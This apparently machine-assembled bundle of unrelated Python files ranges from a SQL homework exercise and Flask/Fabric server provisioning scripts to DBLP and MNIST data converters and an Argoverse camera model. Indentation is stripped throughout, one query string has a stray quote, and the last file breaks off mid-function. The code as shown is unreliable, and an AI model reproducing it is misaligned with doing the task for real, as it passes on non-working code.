#### File: DS-Unit-3-Sprint-2-SQL-and-Databases/module1-introduction-to-sql/rpg_queries_jwh.py
```python
import sqlite3
import pandas as pd
# PART 1 ------------------------------------- Notebook code more recent
def query(q, db = sqlite3.connect('rpg_db.sqlite3')):
cursor = db.cursor()
cursor.execute(q)
result = cursor.fetchall()
cursor.close()
db.commit()
return result
# How many total Characters are there?
q = "SELECT COUNT (*)\
FROM charactercreator_character;"
resultc = query(q)
print(f'{resultc[0][0]} total characters.')
# How many of each specific subclass?
result = query('SELECT COUNT (*) FROM charactercreator_fighter;')
print(f'{result[0][0]} fighters.')
result = query('SELECT COUNT (*) FROM charactercreator_cleric;')
print(f'{result[0][0]} clerics.')
result = query('SELECT COUNT (*) FROM charactercreator_thief;')
print(f'{result[0][0]} thieves.')
result = query('SELECT COUNT (*) FROM charactercreator_mage;')
resultn = query('SELECT COUNT (*) FROM charactercreator_necromancer;')
print(f'{result[0][0]} mages including {resultn[0][0]} necromancers.')
# How many total Items?
resulti = query('SELECT COUNT (*) FROM armory_item;')
print(f'{resulti[0][0]} total items.')
# How many of the Items are weapons? How many are not?
resultw = query('SELECT COUNT (*) FROM armory_weapon;')
print(f'{resultw[0][0]} weapons, {resulti[0][0] - resultw[0][0]} other items.')
# How many Items does each character have? (Return first 20 rows)
result = query('SELECT COUNT(character_id) FROM charactercreator_character_inventory GROUP BY character_id LIMIT 20;')
for i in range(len(result)):
print(f'Character ID: {i + 1} has {result[i][0]} items.')
# How many Weapons does each character have? (Return first 20 rows)
result = query('SELECT cc.character_id as ID, cc.name as person, count(aw.power) as weapons FROM charactercreator_character as cc, charactercreator_character_inventory as cci, armory_weapon as aw WHERE cc.character_id = cci.character_id AND aw.item_ptr_id = cci.item_id GROUP BY cc.character_id ORDER BY weapons DESC, person LIMIT 20;')
for i in range(len(result)):
print(f'{result[i][1]} has {result[i][2]} weapons.')
# On average, how many Items does each Character have?
result = query('SELECT COUNT (*) FROM charactercreator_character_inventory;')
print(f'{round(result[0][0] / resultc[0][0], 2)} average items per character')
# On average, how many Weapons does each character have?
result = query('SELECT COUNT(*) FROM charactercreator_character_inventory as cci, armory_weapon as aw WHERE cci.item_id = aw.item_ptr_id;')
print(f'{round(result[0][0] / resultc[0][0], 2)} average weapons per character')
# PART 2 -------------------------------------
def query(q, db = sqlite3.connect('buddymove_holidayiq.sqlite3')):
cursor = db.cursor()
cursor.execute(q)
result = cursor.fetchall()
cursor.close()
db.commit()
return result
# Open a connection to a new (blank) database file buddymove_holidayiq.sqlite3
db = sqlite3.connect('buddymove_holidayiq.sqlite3')
# Use df.to_sql (documentation) to insert the data into a new table review in the SQLite3 database
df = pd.read_csv('buddymove_holidayiq.csv')
df.to_sql('review', db)
# Count how many rows you have - it should be 249!
result = query('SELECT COUNT(*) FROM review;'')
print(f'{result[0][0]} rows.')
# How many users who reviewed at least 100 Nature in the category also reviewed at least 100 in the Shopping category?
result = query('SELECT COUNT(*) FROM review WHERE Nature >= 100 AND Shopping >= 100;')
print(f'{result[0][0]} users are interested in nature and shopping.')
# (Stretch) What are the average number of reviews for each category?
for category in ['Sports', 'Religious', 'Nature', 'Theatre', 'Shopping', 'Picnic']:
q = f'SELECT AVG({category}) FROM review;'
result = query(q)
print(f'Average interest in {category}: {round(result[0][0])}')
``` |
{
"source": "johnwesleyharding/lambdata_johnwesleyharding",
"score": 3
} |
#### File: lambdata_johnwesleyharding/lambdata_johnwesleyharding/__init__.py
```python
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
"""
"""
def trainvalidtest(df, features, target):
train, test = train_test_split(df)
X_train, X_valid, y_train, y_valid = train_test_split(train[features], train[target])
X_test = test[features]
y_test = test[target]
return X_train, X_valid, y_train, y_valid, X_test, y_test
"""
"""
def monthdayyear(dataframe, datefeature):
def createmonth(date):
return date[:2]
dataframe['Month'] = dataframe[datefeature].apply(createmonth)
def createday(date):
return date[3:5]
dataframe['Day'] = dataframe[datefeature].apply(createday)
def createyear(date):
return date[6:]
dataframe['Year'] = dataframe[datefeature].apply(createyear)
return dataframe
``` |
{
"source": "john-westcott-iv/orionsdk-python",
"score": 2
} |
#### File: orionsdk-python/samples/nta_enable_disable_cbqos_sources.py
```python
from __future__ import print_function
import re
import requests
import pprint
from orionsdk import SwisClient
def main():
# Connect to SWIS
server = 'localhost'
username = 'admin'
password = ''
swis = SwisClient(server, username, password)
# Disable/Enable CBQoS Sources
node_caption = 'My testing router'
query_results = swis.query('SELECT NodeID FROM Orion.Nodes WHERE Caption = @nodecaption_par', nodecaption_par=node_caption)
node_id = query_results['results'][0]['NodeID']
query_results = swis.query('SELECT Uri FROM Orion.Netflow.CBQoSSource WHERE NodeID = @nodeid_par', nodeid_par = node_id)
enabled_flag = False # Change this value to True if you want to enable sources
props = {
'Enabled': enabled_flag
}
for row in query_results['results']:
swis.update(row['Uri'], **props)
# Print results
query_results = swis.query('SELECT CBQoSSourceID FROM Orion.Netflow.CBQoSSource WHERE NodeID = @nodeid_par and Enabled = @enabled_par',
nodeid_par=node_id, enabled_par=enabled_flag)
print('Changed enabled status to {0} for {1} CBQoS sources for node with ID {2}'
.format(enabled_flag, len(query_results['results']), node_id))
if __name__ == '__main__':
main()
``` |
{
"source": "john-w-estes/csc121",
"score": 4
} |
#### File: csc121/lab6/lab6.py
```python
import arcade
def draw_section_outlines():
color = arcade.color.BLACK
#Draw squares on bottom
arcade.draw_rectangle_outline(150, 150, 300, 300, color)
arcade.draw_rectangle_outline(450, 150, 300, 300, color)
arcade.draw_rectangle_outline(750, 150, 300, 300, color)
arcade.draw_rectangle_outline(1050, 150, 300, 300, color)
#Draw squares on top
arcade.draw_rectangle_outline(150, 450, 300, 300, color)
arcade.draw_rectangle_outline(450, 450, 300, 300, color)
arcade.draw_rectangle_outline(750, 450, 300, 300, color)
arcade.draw_rectangle_outline(1050, 450, 300, 300, color)
#First section
def draw_section_1():
for row in range(30):
for col in range(30):
x = 10 * (row + .5)
y = 10 * (col + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
#Second section
def draw_section_2():
for row in range(30):
for col in range(30):
x = 300 + 10 * (row + .5)
y = 10 * (col + .5)
if (row)%2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
#Third section
def draw_section_3():
for row in range(30):
for col in range(30):
x = 600 + 10 * (row + .5)
y = 10 * (col + .5)
if (col)%2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
#Fourth Section
def draw_section_4():
for row in range(30):
for col in range(30):
x = 900 + 10 * (row + .5)
y = 10 * (col + .5)
if row%2 != 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
elif row%2 == 0 and col%2 == 0:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
else:
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.BLACK)
#Firth Section
def draw_section_5():
for row in range(30):
for col in range(row):
x = 10 * (row + .5)
y = 300 + 10 * (col + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
#Sixth Section
def draw_section_6():
for row in range(30):
for col in range(30-row):
x = 300 + 10 * (row + .5)
y = 300 + 10 * (col + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
#Seventh Section
def draw_section_7():
for row in range(31):
for col in range(row):
x = 600 + 10 * (col + .5)
y = 300 + 10 * (row + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
#Eighth Section
def draw_section_8():
for row in range(30):
for col in range(row):
x = 900 + 10 * (29 - col + .5)
y = 300 + 10 * (row + .5)
arcade.draw_rectangle_filled(x, y, 5, 5, arcade.color.WHITE)
def main():
#Create a window
arcade.open_window(1200, 600, "Lab 06 -- Loopy Lab")
arcade.set_background_color(arcade.color.AIR_FORCE_BLUE)
arcade.start_render()
#Draw the outlines for the sections
draw_section_outlines()
#Draw the sections
draw_section_1()
draw_section_2()
draw_section_3()
draw_section_4()
draw_section_5()
draw_section_6()
draw_section_7()
draw_section_8()
arcade.finish_render()
arcade.run()
if __name__=='__main__':
main()
``` |
{
"source": "johnwheeler/flask-live-starter",
"score": 2
} |
#### File: flask-live-starter/fabfile/install.py
```python
from fabric.api import task, sudo
from fabric.contrib.files import sed
from fabric.context_managers import cd
from .constants import *
__all__ = ['system', 'postgres', 'redis']
@task
def system():
_system_update_upgrade()
# unattended upgrades
_install('needrestart')
_install('unattended-upgrades')
sudo('cp /usr/share/unattended-upgrades/20auto-upgrades /etc/apt/apt.conf.d/20auto-upgrades')
# python related
_install('libffi-dev')
_install('libssl-dev')
_install('python-dev')
_install('python-pip')
_install('python-virtualenv')
# wsgi
_install('gunicorn')
# httpd
_install('nginx')
# firewall
_install('ufw')
# letsencrypt
_install('python-certbot-nginx -t jessie-backports')
@task
def postgres():
# add postgres repository to apt
sudo("sh -c 'echo deb http://apt.postgresql.org/pub/repos/apt/ jessie-pgdg main > /etc/apt/sources.list.d/pgdg.list'")
sudo('wget --quiet -O - https://www.postgresql.org/media/keys/ACCC4CF8.asc | apt-key add -')
sudo('apt-get update')
# install postgresql components
pg_version = '9.6'
_install('postgresql-{}'.format(pg_version))
_install('postgresql-client-{}'.format(pg_version))
_install('postgresql-server-dev-{}'.format(pg_version))
_install('postgresql-contrib-{}'.format(pg_version))
@task
def redis():
# make required directories
sudo('mkdir /etc/redis')
sudo('mkdir /var/redis')
sudo('mkdir /var/redis/6379')
# download
sudo('wget http://download.redis.io/redis-stable.tar.gz')
# untar
sudo('tar xzf redis-stable.tar.gz')
with cd('redis-stable'):
# make & make install
sudo('make')
sudo('make install')
# copy system init script
sudo('cp utils/redis_init_script /etc/init.d/redis_6379')
# copy redis configuration file
sudo('cp redis.conf /etc/redis/6379.conf')
# edit the configuration file
sed('/etc/redis/6379.conf', '^daemonize no$', 'daemonize yes', use_sudo=True)
sed('/etc/redis/6379.conf', '^logfile ""$',
'logfile /var/log/redis_6379.log', use_sudo=True)
sed('/etc/redis/6379.conf', '^dir ./$',
'dir /var/redis/6379', use_sudo=True)
# update script init links
sudo('update-rc.d redis_6379 defaults')
# start redis system service
sudo('service redis_6379 start')
# clean up
sudo('rm -rf redis-stable')
sudo('rm redis-stable.tar.gz')
def _system_update_upgrade():
# backports
sudo("sh -c 'echo deb http://ftp.us.debian.org/debian/ jessie-backports main >> /etc/apt/sources.list'")
# update
sudo('apt-get update')
# upgrade
sudo('apt-get upgrade -y')
def _install(pkg):
sudo('DEBIAN_FRONTEND=noninteractive apt-get install {} -y'.format(pkg))
```
#### File: flask-live-starter/fabfile/provision.py
```python
from fabric.api import task, sudo
from .constants import *
__all__ = ['certificate', 'firewall', 'database']
@task
def certificate():
sudo('certbot --nginx --non-interactive --agree-tos --redirect --domain {} --domain {}.{} --email {}'
.format(DOMAIN, SUBDOMAIN, DOMAIN, EMAIL))
@task
def firewall():
# allow http
sudo('ufw allow 80/tcp')
# allow https
sudo('ufw allow 443/tcp')
# allow ssh
sudo('ufw allow 22/tcp')
# enable firewall
sudo('ufw --force enable')
@task
def database():
sudo('createuser {} -P'.format(APP_NAME), user='postgres')
sudo('createdb {} -O {}'.format(APP_NAME, APP_NAME), user='postgres')
```
#### File: flask-live-starter/fabfile/remote.py
```python
import os
from datetime import datetime
from fabric.api import task, local, sudo, put
from fabric.contrib import files
from jinja2 import Environment, FileSystemLoader
from .constants import *
__all__ = ['deploy', 'undeploy', 'backup', 'tail', 'reset_log']
@task
def tail(grep=""):
sudo("tail -F -n +1 {} | grep --line-buffered -i '{}'"
.format(REMOTE_LOG_FILE, grep))
@task
def reset_log():
sudo("rm -f {}".format(REMOTE_LOG_FILE))
sudo("service gunicorn reload")
@task
def deploy():
_upload_archive()
_extract_archive()
_update_py_deps()
_ensure_log_dir()
_configure_gunicorn()
_configure_nginx()
@task
def undeploy():
sudo('rm -rf {}'.format(REMOTE_DEPLOY_DIR))
if files.exists(REMOTE_GUNICORN_CONF_FILE):
sudo('rm {}'.format(REMOTE_GUNICORN_CONF_FILE))
sudo("service gunicorn restart")
if files.exists(REMOTE_NGINX_CONF_FILE):
sudo('rm {}'.format(REMOTE_NGINX_CONF_FILE))
sudo('service nginx restart')
@task
def backup():
timestamp = datetime.now().strftime('%Y-%m-%d_%H%M')
dump_file = '%s-remote-%s.dmp' % (APP_NAME, timestamp)
pg_dump_cmd = 'pg_dump {} -U {} -h localhost -x -Fc -f {}' \
.format(APP_NAME, APP_NAME, dump_file)
sudo(pg_dump_cmd)
if not os.path.exists(LOCAL_BACKUPS_DIR):
local('mkdir {}'.format(LOCAL_BACKUPS_DIR))
files.get(dump_file, LOCAL_BACKUPS_DIR)
sudo("rm %s" % dump_file)
def _upload_archive():
outdir = 'dist/{}'.format(APP_NAME)
local('mkdir -p {}'.format(outdir))
local('cp requirements.txt {}'.format(outdir))
local('cp -R {} {}'.format(APP_NAME, outdir))
local('find {} -name "*.pyc" -type f -delete'.format(outdir))
local('tar czf {} {}'.format(LOCAL_ARCHIVE, outdir))
put(LOCAL_ARCHIVE, REMOTE_ARCHIVE, use_sudo=True)
local('rm -rf dist')
def _extract_archive():
if not files.exists(REMOTE_DEPLOY_DIR, use_sudo=True):
sudo('mkdir {}'.format(REMOTE_DEPLOY_DIR))
sudo('chown -R www-data:www-data {}'.format(REMOTE_DEPLOY_DIR))
sudo('chmod -R og-rwx,g+rxs {}'.format(REMOTE_DEPLOY_DIR))
sudo('rm -rf {}'.format(REMOTE_APP_DIR))
sudo('tar xmzf {} -C {} --strip-components=2'.format(REMOTE_ARCHIVE, REMOTE_DEPLOY_DIR))
sudo('rm {}'.format(REMOTE_ARCHIVE))
def _update_py_deps():
if not files.exists(REMOTE_VENV, use_sudo=True):
sudo('virtualenv {}'.format(REMOTE_VENV))
sudo('{}/bin/pip install -r {}/requirements.txt'.format(REMOTE_VENV, REMOTE_DEPLOY_DIR))
def _ensure_log_dir():
if not files.exists(REMOTE_LOG_DIR):
sudo('mkdir {}'.format(REMOTE_LOG_DIR))
sudo('chown -R www-data:www-data {}'.format(REMOTE_LOG_DIR))
sudo('chmod -R og-rwx,g+rxs {}'.format(REMOTE_LOG_DIR))
def _configure_gunicorn():
if not files.exists(REMOTE_GUNICORN_CONF_FILE):
files.upload_template(LOCAL_GUNICORN_CONF_FILE,
REMOTE_GUNICORN_CONF_FILE,
context={'app_name': APP_NAME},
template_dir=LOCAL_ETC_DIR,
use_jinja=True,
use_sudo=True)
sudo("service gunicorn restart")
def _configure_nginx():
if not files.exists(REMOTE_NGINX_CONF_FILE):
files.upload_template(LOCAL_NGINX_CONF_FILE,
REMOTE_NGINX_CONF_FILE,
context={
'app_name': APP_NAME,
'domain': DOMAIN,
'subdomain': SUBDOMAIN
},
template_dir=LOCAL_ETC_DIR,
use_jinja=True,
use_sudo=True)
sudo('service nginx reload')
``` |
{
"source": "johnwheffner/acacrits",
"score": 2
} |
#### File: acacrits/controllers/athlete.py
```python
def index():
response.title = "Athletes"
grid = SQLFORM.grid(db.athlete, editable=True, user_signature=False)
return locals()
```
#### File: acacrits/controllers/marshal.py
```python
def index():
response.title = "Marshals"
grid = SQLFORM.grid(db.marshal, editable=True, user_signature=False)
return locals()
```
#### File: acacrits/controllers/team.py
```python
def index():
response.title = "Teams"
grid = SQLFORM.grid(db.team, editable=True, user_signature=False)
return locals()
``` |
{
"source": "johnwickerson/dblp-playground",
"score": 2
} |
#### File: johnwickerson/dblp-playground/dblp-xml-to-tsv.py
```python
import xml.sax
import codecs
import sys
xml_path = sys.argv[1]
tl = ['article', 'inproceedings', 'proceedings', 'book', 'incollection', 'phdthesis', 'mastersthesis', 'www']
at = ['title', 'booktitle', 'pages', 'year', 'address', 'journal', 'volume', 'number', 'month', 'url', 'ee', 'cdrom', 'cite', 'publisher', 'note', 'crossref', 'isbn', 'series', 'school', 'chapter']
sl = ['mdate', 'publtype', 'reviewid', 'rating', 'key']
pages = ['begin', 'end', 'numpages']
csvfields = ['etype'] + at + sl + pages
csvlengths = {}
for f in csvfields:
csvlengths[f] = 0
for f in tl:
csvlengths[f] = 0
csvlengths['author'] = 0
csvlengths['editor'] = 0
writtenBy = codecs.open("writtenBy.tsv", "w", "utf-8")
papers = codecs.open("papers.tsv", "w", "utf-8")
authors = codecs.open("authors.tsv", "w", "utf-8")
editedBy = codecs.open("editedBy.tsv", "w", "utf-8")
lengths = codecs.open("lengths.tsv", "w", "utf-8")
authorFirstNameLength = 0
authorLastNameLength = 0
class DBLPXMLHANDLER(xml.sax.ContentHandler):
cfields = {}
distAuthors = {}
cval = ""
paperCounter = 0
authorCounter = 0
authorID = 0
def startElement(self, name, attrs):
if name in tl:
self.cfields.clear()
self.cval = ""
self.cfields['anum'] = 1
self.cfields['etype'] = name
for s in tl:
self.cfields[s] = '\N'
for s in at:
self.cfields[s] = '\N'
for s in sl:
self.cfields[s] = '\N'
for s in pages:
self.cfields[s] = '\N'
for (k, v) in attrs.items():
self.cfields[k] = v
if name in ['author'] + csvfields:
self.cval = ""
if name in ['editor'] + csvfields:
self.cval = ""
def characters(self, content):
self.cval = self.cval + content
def endElement(self, name):
if name in (tl + csvfields) and not self.cval.isdigit() and csvlengths[name] < len(self.cval):
csvlengths[name] = len(self.cval)
#editors and authors share the same tsv, but not the same writtenBy/ editedBy
if name == 'author' or name == 'editor':
global authorFirstNameLength
global authorLastNameLength
if self.cval in self.distAuthors:
authorID = self.distAuthors[self.cval]
else:
self.distAuthors[self.cval] = self.authorCounter;
authorID = self.authorCounter;
self.authorCounter += 1
authorName = self.cval.split()
authorFirstName =""
for x in xrange(len(authorName) - 1):
authorFirstName += authorName[x]
if x<(len(authorName)-1):
authorFirstName += " "
authorLastName = authorName[len(authorName) - 1]
if authorFirstName is " ":
authorFirstName = "\N"
if len(authorFirstName) > authorFirstNameLength:
authorFirstNameLength = len(authorFirstName)
if len(authorLastName) > authorLastNameLength:
authorLastNameLength = len(authorLastName)
authors.write(str(authorID) + "\t" + self.cval + "\t" + authorFirstName + "\t" + authorLastName + "\n")
if name == 'author':
writtenBy.write(str(self.paperCounter) + "\t" + str(authorID) + "\t" + str(self.cfields['anum']).encode("utf-8").decode("utf-8") + "\n")
self.cfields['anum'] = self.cfields['anum'] + 1
else: #name == 'editor'
editedBy.write(str(self.paperCounter) + "\t" + str(authorID) + "\t" + str(self.cfields['anum']).encode("utf-8").decode("utf-8") + "\n")
self.cfields['anum'] = self.cfields['anum'] + 1
if name in at:
if name == 'pages':
pageArray = self.cval.split('-')
if len(pageArray) == 2:
pageFromArray = pageArray[0].split(':')
pageFrom = pageFromArray[len(pageFromArray) - 1]
pageToArray = pageArray[1].split(':')
pageTo = pageToArray[len(pageToArray) - 1]
if pageFrom.isdigit() and pageTo.isdigit():
self.cfields['begin'] = pageFrom
self.cfields['end'] = pageTo
self.cfields[name] = self.cval
if name in tl:
line = []
for f in csvfields:
line.append(self.cfields.get(f, ''))
papers.write('\t'.join(line))
papers.write('\t' + str(self.paperCounter))
self.paperCounter = self.paperCounter + 1
papers.write('\n')
parser = xml.sax.make_parser()
parser.setContentHandler(DBLPXMLHANDLER())
parser.parse(open(xml_path, "r"))
for key in csvlengths:
lengths.write(key + "\t" + str(csvlengths.get(key, '')) + "\n")
lengths.write("FirstName\t" + str(authorFirstNameLength) + "\n")
lengths.write("LastName\t" + str(authorLastNameLength) + "\n")
papers.close()
authors.close()
writtenBy.close()
editedBy.close()
lengths.close()
``` |
{
"source": "johnwikman/miking-ml",
"score": 3
} |
#### File: miking-ml/preprocessing/mnist-binary-preprocess.py
```python
import struct
import sys
def uint32_from_be(bs):
assert len(bs) == 4
return struct.unpack(">I", bs)[0]
if len(sys.argv) != 4:
print(f"usage: {sys.argv[0]} <binary data file> <binary label file> <target ASCII file>")
bin_datafile = sys.argv[1]
bin_labelfile = sys.argv[2]
outfile = sys.argv[3]
datapoints = []
print(f"reading images from {bin_datafile}...")
with open(bin_datafile, "rb") as f:
bs = f.read()
magic_number = uint32_from_be(bs[0:4])
assert magic_number == 2051, f"Invalid magic number {magic_number}, expected 2051"
n_images = uint32_from_be(bs[4:8])
rows = uint32_from_be(bs[8:12])
cols = uint32_from_be(bs[12:16])
assert rows == 28, f"Expected number of rows to be 28, got {rows}"
assert cols == 28, f"Expected number of cols to be 28, got {cols}"
expected_bytes = 16 + (rows * cols * n_images)
assert expected_bytes == len(bs), f"Expected number of bytes to be {expected_bytes}, got {len(bs)}"
for i in range(n_images):
start = 16 + (i * rows * cols)
end = 16 + ((i + 1) * rows * cols)
datapoints.append((None, bs[start:end]))
print(f"reading labels from {bin_labelfile}...")
with open(bin_labelfile, "rb") as f:
bs = f.read()
magic_number = uint32_from_be(bs[0:4])
assert magic_number == 2049, f"Invalid magic number {magic_number}, expected 2049"
n_labels = uint32_from_be(bs[4:8])
assert n_labels == len(datapoints), f"Expected number of labels to be {len(datapoints)}, got {n_labels}"
expected_bytes = 8 + n_labels
assert expected_bytes == len(bs), f"Expected number of bytes to be {expected_bytes}, got {len(bs)}"
for i in range(n_labels):
_, data = datapoints[i]
datapoints[i] = (int(bs[8+i]), data)
print(f"writing to {outfile}...")
# Outfile format is the bytes written in decimal, with LF separating datapoints
with open(outfile, "w+") as f:
for (cls, data) in datapoints:
f.write(f"{cls}")
for d in data:
f.write(f" {d}")
f.write("\n")
print("done.")
``` |
{
"source": "johnwilson/picocms",
"score": 2
} |
#### File: picocms/tests/test_picocms.py
```python
import unittest
import os
import shutil
import json
from flask import Flask
from flask_picocms import CMS
basedir = os.path.abspath(os.path.dirname(__file__))
class RepositoryCreationTestCase(unittest.TestCase):
def setUp(self):
self.dbname = "picocms-test.sqlite"
app = Flask(__name__)
app.config["PICOCMS_DATABASE"] = os.path.join(basedir, self.dbname)
app.config["PICOCMS_SOURCE_PAGES"] = os.path.join(basedir, "sample", "pages")
app.config["PICOCMS_SOURCE_DATA"] = os.path.join(basedir, "sample", "data")
pico = CMS(app)
self.app = app
self.pico = pico
self.pico.rebuild()
def tearDown(self):
self.pico.teardown(None)
if os.path.exists(self.app.config["PICOCMS_DATABASE"]):
os.remove(self.app.config["PICOCMS_DATABASE"])
def test_db_creation(self):
self.assertTrue(os.path.exists(self.app.config["PICOCMS_DATABASE"]))
def test_page_creation(self):
self.assertEqual(self.pico.content_count, 3)
def test_data_creation(self):
self.assertEqual(self.pico.data_count, 1)
def test_page_content(self):
page = self.pico.get_content("/index")
self.assertTrue(page.meta["draft"])
self.assertEqual(page.meta["name"], "index")
def test_doc_content(self):
doc = self.pico.get_data("/site")
self.assertEqual(doc.meta["name"], "site")
self.assertEqual(doc.json["name"], "PicoCMS")
def test_page_list(self):
res = self.pico.list_content("/news")
self.assertEqual(len(res), 2)
self.assertEqual(res[0]["title"], "news item 2")
``` |
{
"source": "johnwingit/gzJinHong",
"score": 3
} |
#### File: gzJinHong/tests/getLineTable.py
```python
import fitz
from Jinhong_tools import *
def isdigit(x):
try:
x=int(x)
return isinstance(x,int)
except ValueError:
return False
# to load database
# it the text Extracted from pdf file
filepath = "../database/Db.txt"
jinl = Jinhong_tools(filepath)
DBltable = jinl.loadlinetableDB()
print(DBltable)
dictDB_ltableNO = jinl.loadlinetableNODB()
print(dictDB_ltableNO)
# To find the exact position of String
doc = fitz.open("../pdffile/YT4856.pdf")
page = doc[0]
# Open a data txt file.
fileForR = open("../pdffile/data.txt", "r")
fileForW = open("../LineTable/ReadLineTable06.txt", "w")
fileForW.write("%6s, %6s, %s, %s , %s \n" % ("x坐标", "y坐标", "材料型号编号","本公司编号","材料名称"))
line = fileForR.readline() # 调用文件的 readline()方法
while line:
# 后面跟 ',' 将忽略换行符
count =0
text =""
for ch in line:
if isdigit(ch):
text = text + ch
#print(ch)
count=count+1
else:
break
if count> 7:
print(line)
print(text)
lineno=text.strip()
text_instances = page.searchFor(text)
#print(text_instances)
x=text_instances[0][0]
y=text_instances[0][1]
s4 = dictDB_ltableNO[lineno]
s5= DBltable[lineno]
print(s4+s5)
fileForW.write("%6d, %6d, %s,%s,%s \n" % (x, y, lineno, s4, s5))
line = fileForR.readline()
fileForW.close()
fileForR.close()
``` |
{
"source": "johnwlambert/argoverse2-api",
"score": 3
} |
#### File: geometry/camera/pinhole_camera.py
```python
from __future__ import annotations
from dataclasses import dataclass
from functools import cached_property
from pathlib import Path
from typing import Tuple, Union
import numpy as np
import av2.geometry.geometry as geometry_utils
import av2.utils.io as io_utils
from av2.geometry.se3 import SE3
from av2.utils.typing import NDArrayBool, NDArrayFloat, NDArrayInt
@dataclass(frozen=True)
class Intrinsics:
"""Models a camera intrinsic matrix.
Args:
fx_px: Horizontal focal length in pixels.
fy_px: Vertical focal length in pixels.
cx_px: Horizontal focal center in pixels.
cy_px: Vertical focal center in pixels.
width_px: Width of image in pixels.
height_px: Height of image in pixels.
"""
fx_px: float
fy_px: float
cx_px: float
cy_px: float
width_px: int
height_px: int
@cached_property
def K(self) -> NDArrayFloat:
"""Camera intrinsic matrix."""
K: NDArrayFloat = np.eye(3, dtype=float)
K[0, 0] = self.fx_px
K[1, 1] = self.fy_px
K[0, 2] = self.cx_px
K[1, 2] = self.cy_px
return K
@dataclass(frozen=True)
class PinholeCamera:
"""Parameterizes a pinhole camera with zero skew.
Args:
ego_SE3_cam: pose of camera in the egovehicle frame (inverse of extrinsics matrix).
intrinsics: `Intrinsics` object containing intrinsic parameters and image dimensions.
cam_name: sensor name that camera parameters correspond to.
"""
ego_SE3_cam: SE3
intrinsics: Intrinsics
cam_name: str
@property
def width_px(self) -> int:
"""Return the width of the image in pixels."""
return self.intrinsics.width_px
@property
def height_px(self) -> int:
"""Return the height of the image in pixels."""
return self.intrinsics.height_px
@cached_property
def extrinsics(self) -> NDArrayFloat:
"""Return the camera extrinsics."""
return self.ego_SE3_cam.inverse().transform_matrix
@classmethod
def from_feather(cls, log_dir: Path, cam_name: str) -> PinholeCamera:
"""Create a pinhole camera model from a feather file.
Note: Data is laid out with sensor names along row dimension, and columns are sensor attribute data.
Args:
log_dir: path to a log directory containing feather files w/ calibration info.
cam_name: name of the camera.
Returns:
A new PinholeCamera object, containing camera extrinsics and intrinsics.
"""
intrinsics_path = log_dir / "calibration" / "intrinsics.feather"
intrinsics_df = io_utils.read_feather(intrinsics_path).set_index("sensor_name")
params = intrinsics_df.loc[cam_name]
intrinsics = Intrinsics(
fx_px=params["fx_px"],
fy_px=params["fy_px"],
cx_px=params["cx_px"],
cy_px=params["cy_px"],
width_px=int(params["width_px"]),
height_px=int(params["height_px"]),
)
sensor_name_to_pose = io_utils.read_ego_SE3_sensor(log_dir)
return cls(
ego_SE3_cam=sensor_name_to_pose[cam_name],
intrinsics=intrinsics,
cam_name=cam_name,
)
def cull_to_view_frustum(self, uv: NDArrayFloat, points_cam: NDArrayFloat) -> NDArrayBool:
"""Cull 3d points to camera view frustum.
Given a set of coordinates in the image plane and corresponding points
in the camera coordinate reference frame, determine those points
that have a valid projection into the image. 3d points with valid
projections have x coordinates in the range [0,width_px-1], y-coordinates
in the range [0,height_px-1], and a positive z-coordinate (lying in
front of the camera frustum).
Ref: https://en.wikipedia.org/wiki/Hidden-surface_determination#Viewing-frustum_culling
Args:
uv: Numpy array of shape (N,2) representing image plane coordinates in [0,W-1] x [0,H-1]
where (H,W) are the image height and width.
points_cam: Numpy array of shape (N,3) representing corresponding 3d points in the camera coordinate frame.
Returns:
Numpy boolean array of shape (N,) indicating which points fall within the camera view frustum.
"""
is_valid_x = np.logical_and(0 <= uv[:, 0], uv[:, 0] < self.width_px - 1)
is_valid_y = np.logical_and(0 <= uv[:, 1], uv[:, 1] < self.height_px - 1)
is_valid_z = points_cam[:, 2] > 0
is_valid_points: NDArrayBool = np.logical_and.reduce([is_valid_x, is_valid_y, is_valid_z])
return is_valid_points
def project_ego_to_img(
self, points_ego: NDArrayFloat, remove_nan: bool = False
) -> Tuple[NDArrayFloat, NDArrayFloat, NDArrayBool]:
"""Project a collection of 3d points (provided in the egovehicle frame) to the image plane.
Args:
points_ego: numpy array of shape (N,3) representing points in the egovehicle frame.
remove_nan: whether to remove coordinates that project to invalid (NaN) values.
Returns:
uv: image plane coordinates, as Numpy array of shape (N,2).
points_cam: camera frame coordinates as Numpy array of shape (N,3) representing
is_valid_points: boolean indicator of valid cheirality and within image boundary, as
boolean Numpy array of shape (N,).
"""
# convert cartesian to homogeneous coordinates.
points_ego_hom = geometry_utils.cart_to_hom(points_ego)
points_cam: NDArrayFloat = self.extrinsics @ points_ego_hom.T
# remove bottom row of all 1s.
uv = self.intrinsics.K @ points_cam[:3, :]
uv = uv.T
points_cam = points_cam.T
if remove_nan:
uv, points_cam = remove_nan_values(uv, points_cam)
uv = uv[:, :2] / uv[:, 2].reshape(-1, 1)
is_valid_points = self.cull_to_view_frustum(uv, points_cam)
return uv, points_cam, is_valid_points
def project_cam_to_img(
self, points_cam: NDArrayFloat, remove_nan: bool = False
) -> Tuple[NDArrayFloat, NDArrayFloat, NDArrayBool]:
"""Project a collection of 3d points in the camera reference frame to the image plane.
Args:
points_cam: numpy array of shape (N,3) representing points in the egovehicle frame.
remove_nan: whether to remove coordinates that project to invalid (NaN) values.
Returns:
uv: image plane coordinates, as Numpy array of shape (N,2).
points_cam: camera frame coordinates as Numpy array of shape (N,3) representing
is_valid_points: boolean indicator of valid cheirality and within image boundary, as
boolean Numpy array of shape (N,).
"""
uv = self.intrinsics.K @ points_cam[:3, :]
uv = uv.T
points_cam = points_cam.T
if remove_nan:
uv, points_cam = remove_nan_values(uv, points_cam)
